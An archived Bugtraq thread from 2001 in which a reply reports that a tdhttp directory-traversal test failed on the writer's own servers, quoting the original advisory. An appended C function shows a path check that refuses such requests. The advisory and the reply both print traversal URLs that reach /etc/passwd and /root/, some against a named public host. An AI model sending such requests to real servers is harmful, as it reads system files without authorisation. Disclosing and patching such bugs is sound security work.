Bugtraq mailing list archives
Re: tdhttp transversal bug
From: sekure <sekure () hadrion com br>
Date: Tue, 13 Feb 2001 16:25:32 -0300
Hello,

I did other tests... and it didn't work here again on my 3 Linux servers... look:

http://192.168.151.100/../../../../../../../../../../etc/passwd
http://192.168.151.150/../../../../../../../../../../etc/passwd
http://192.168.151.1/../../../../../../../../../../etc/passwd

All return me this message:

Bad Request
Your browser sent a request that this server could not understand.
Invalid URI in request GET /../../../../../../../../../../etc/passwd HTTP/1.1

Thanks
[ ]'s

-----Original message-----
From: UkR-XblP? <cuctema () OK RU>
To: BUGTRAQ () SECURITYFOCUS COM <BUGTRAQ () SECURITYFOCUS COM>
Date: Monday, 12 February 2001 21:17
Subject: tdhttp transversal bug

-=-=-=-=-=[ UkR security team - advisory n0. 7 ]=-=-=-=-=-
tdhttp transversal bug
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: 07.02.2001

Problem: possibility of arbitrary file retrieval and directory listing on remote host, running tdhttp (http.c, probably all its versions).

Workaround: try another http daemon (Apache, for ex.) and disable http service 'till that time.

Comment: duh. I wonder if I can see /etc/passwd right in my IE window. No matter it's only beta version, I mean http.c. After all, this bug is well-known.

Authors: XblP, S1LENCE

Example:
http://www.timduff.com/../../../../../../../../../../etc/passwd
http://www.timduff.com/../../../../../../../../../../root/
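
Added example, not part of either message and not code from tdhttp's http.c: a lexical path check of the kind a server needs before joining a request path to its document root, so that a request such as the one in the advisory is refused the way the reply's servers refuse it. The function name and its policy of refusing percent-encoded and backslash segments instead of decoding them are assumptions made for this sketch.

```c
#include <stdio.h>
#include <string.h>
/* Hypothetical helper (not from tdhttp's http.c): lexically normalise a
 * request path before it is joined to the document root. Returns 0 and
 * writes the result to out, or -1 if the request must be refused. */
int normalize_request_path(const char *uri, char *out, size_t outlen)
{
    size_t len = 0;                       /* bytes written to out so far */
    if (uri == NULL || uri[0] != '/' || outlen < 2)
        return -1;                        /* only absolute paths accepted */
    while (*uri) {
        while (*uri == '/')               /* collapse repeated slashes */
            uri++;
        size_t seg = strcspn(uri, "/");   /* length of the next segment */
        if (seg == 0)
            break;
        /* Assumption: encoded and backslash forms are refused, not decoded. */
        if (memchr(uri, '%', seg) || memchr(uri, '\\', seg))
            return -1;
        if (seg == 1 && uri[0] == '.') {
            /* "." stays in the current directory */
        } else if (seg == 2 && uri[0] == '.' && uri[1] == '.') {
            if (len == 0)
                return -1;                /* ".." would climb above the root */
            while (len > 0 && out[--len] != '/')
                ;                         /* drop the last kept segment */
        } else {
            if (len + seg + 2 > outlen)
                return -1;                /* result would not fit in out */
            out[len++] = '/';
            memcpy(out + len, uri, seg);
            len += seg;
        }
        uri += seg;
    }
    if (len == 0)
        out[len++] = '/';
    out[len] = '\0';
    return 0;
}

int main(void)
{
    char buf[256];
    const char *req = "/../../../../../../../../../../etc/passwd"; /* path from the advisory */
    int rc = normalize_request_path(req, buf, sizeof buf);
    printf("%s -> %s\n", req, rc == 0 ? buf : "400 Bad Request");
    return 0;
}
```

A lexical check like this does not follow symbolic links; a server that allows them under its document root would also need to compare the resolved filesystem path against the root.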